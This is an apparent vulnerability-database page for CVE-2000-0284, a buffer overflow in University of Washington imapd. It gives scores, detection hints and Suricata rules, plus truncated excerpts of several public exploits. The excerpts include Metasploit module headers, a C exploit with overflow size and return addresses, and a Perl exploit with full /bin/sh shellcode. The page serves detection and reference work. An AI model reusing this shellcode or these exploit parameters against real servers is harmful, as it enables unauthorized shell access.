CVE-2000-0284
published 2000-04-16CVE-2000-0284: Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
69.48%
99.3th percentile
Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| university_of_washington | imap | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
bytes↗
\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd\x5f\xc6\x45\xde\x5f
- →Detect IMAP LSUB command with a literal argument of 1064 bytes ({1064}), which is the exact overflow trigger size used by all known exploits for CVE-2000-0284. ↗
- →Flag IMAP sessions where an LSUB, LIST, COPY, RENAME, or FIND command is followed immediately by a large literal (>= 1064 bytes) — all these commands are confirmed overflow vectors. ↗
- →Alert on IMAP banner matching 'IMAP4rev1 v12.264' or 'IMAP4rev1 v12.261' or '2000.284' — these are the confirmed vulnerable versions. ↗
- →Monitor for NOP sled patterns (0x90 repeated) followed by shellcode in IMAP literal data streams on port 143, consistent with stack-based buffer overflow exploitation. ↗
- →Detect IMAP PARTIAL command with an oversized BODY argument containing non-printable/binary data — used as an alternative overflow vector in the TESO exploit. ↗
- →Exploitation requires valid IMAP credentials; correlate successful LOGIN events immediately followed by anomalous LSUB/LIST/COPY/RENAME/FIND commands with large literals as a high-fidelity detection pattern. ↗
- ·Exploitation requires a valid account on the target system; unauthenticated remote exploitation is not possible. Detection rules should account for the mandatory LOGIN step before the malicious command. ↗
- ·The Metasploit bruteforce target uses a return address range (0xbffffdfc to 0xbfa00000, step 200), meaning exploit traffic may appear as many repeated LSUB connections with slightly varying payloads rather than a single attempt. ↗
- ·Bad characters excluded from payload differ between exploit variants: the original Metasploit module excludes \x00\x0a\x0d, while the updated version also excludes \x2f (forward slash). Signature-based detection must account for both payload encodings. ↗
- ·Privileges are dropped in imapd before the vulnerable code path is reached, so successful exploitation yields only the privilege level of the authenticated user, not root. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL IMAP find overflow attempt
suricata·2010-09-23
CVE-2000-0284 GPL IMAP find overflow attempt
GPL IMAP find overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP find overflow attempt"; flow:established,to_server; content:"FIND"; nocase; isdataat:100,relative; pcre:"/\sFIND\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101904; rev:8; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
GPL IMAP rename overflow attempt
suricata·2010-09-23
CVE-2000-0284 GPL IMAP rename overflow attempt
GPL IMAP rename overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP rename overflow attempt"; flow:established,to_server; content:"RENAME"; nocase; isdataat:100,relative; pcre:"/\sRENAME\s[^\n]{100}/smi"; reference:bugtraq,1110; reference:cve,2000-0284; reference:nessus,10374; classtype:misc-attack; sid:2101903; rev:9; metadata:created_at 2010_09_23, cve CVE_2000_0284, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)
exploitdb·2010-03-26
CVE-2000-0284 UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)
UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)
---
##
# $Id: imap_uw_lsub.rb 8932 2010-03-26 19:00:23Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
'Author' => [ 'patrick', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8932 $',
'References' =>
[
[ 'CVE', '2000-0284'
Exploit-DB
UoW IMAPd Server 10.234/12.264 - Remote Buffer Overflow
exploitdb·2002-08-01
CVE-2000-0284 UoW IMAPd Server 10.234/12.264 - Remote Buffer Overflow
UoW IMAPd Server 10.234/12.264 - Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/1110/info
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on the machi
Exploit-DB
WU-IMAP 2000.287(1-2) - Remote Overflow
exploitdb·2002-06-25
CVE-2000-0284 WU-IMAP 2000.287(1-2) - Remote Overflow
WU-IMAP 2000.287(1-2) - Remote Overflow
---
/* 7350owex- x86/linux WU-IMAP 2000.287(1-2) remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2002
* All Rights Reserved
*
* bug found by scut 2002/06/25
Exploit-DB
IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow
exploitdb·2001-03-03
CVE-2000-0284 IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow
IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow
---
/*
* !!! Private !!!
*
* imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes!
*
* By: SkyLaZarT ( [email protected] ) .aka. Felipe Cerqueira
* Homepage: www.BufferOverflow.Org
* Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
* Antonio Marcelo and Felipe Saraiva
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIZE 1064
#define NOP 0x90
#define RET12261 0xbffff3ec
#define RET12264 0xbffff4e0
#define RET12264ZOOT 0xbffff697
#define RET2000_284 0xbfffebc8
#define INIT(x) bzero(x, sizeof(x))
#define READ(sock,x) read(sock, x, sizeof(x))
#define TIMEOUT 20
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46
Exploit-DB
IMAP4rev1 10.190 - Authentication Stack Overflow
exploitdb·2001-01-19
CVE-2000-0284 IMAP4rev1 10.190 - Authentication Stack Overflow
IMAP4rev1 10.190 - Authentication Stack Overflow
---
#!/usr/bin/perl
## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: [email protected] / anno 2000
##
## This is nothing new - just wrote it for fun.
$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
"\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
"\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
"\x2f\x32\x39\x3e\x2f\x43\x38";
$len = 1052; # Sufficient to overwrite the return value.
$nop = A; # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.
if (@ARGV \n");
exit(1);
}
($target, $offset) = @ARGV;
for ($i = 0; $i < ($len - length($shellcode) - 1
Exploit-DB
University of Washington - imap LSUB Buffer Overflow (Metasploit)
exploitdb·2000-04-16
CVE-2000-0284 University of Washington - imap LSUB Buffer Overflow (Metasploit)
University of Washington - imap LSUB Buffer Overflow (Metasploit)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2000-0284' ],
[ 'OSVDB', '12037' ],
[ 'BID', '1110' ],
[ 'URL
Exploit-DB
UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit)
exploitdb·2000-04-16
CVE-2000-0284 UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit)
UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit)
---
source: https://www.securityfocus.com/bid/1110/info
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on t
Exploit-DB
UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit)
exploitdb·2000-04-16
CVE-2000-0284 UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit)
UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit)
---
source: https://www.securityfocus.com/bid/1110/info
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on th
Metasploit
UoW IMAP Server LSUB Buffer Overflow
metasploit
UoW IMAP Server LSUB Buffer Overflow
UoW IMAP Server LSUB Buffer Overflow
This module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-04/0074.htmlhttp://archives.neohapsis.com/archives/bugtraq/2000-04/0085.htmlhttp://www.securityfocus.com/bid/1110http://archives.neohapsis.com/archives/bugtraq/2000-04/0074.htmlhttp://archives.neohapsis.com/archives/bugtraq/2000-04/0085.htmlhttp://www.securityfocus.com/bid/1110
2000-04-16
Published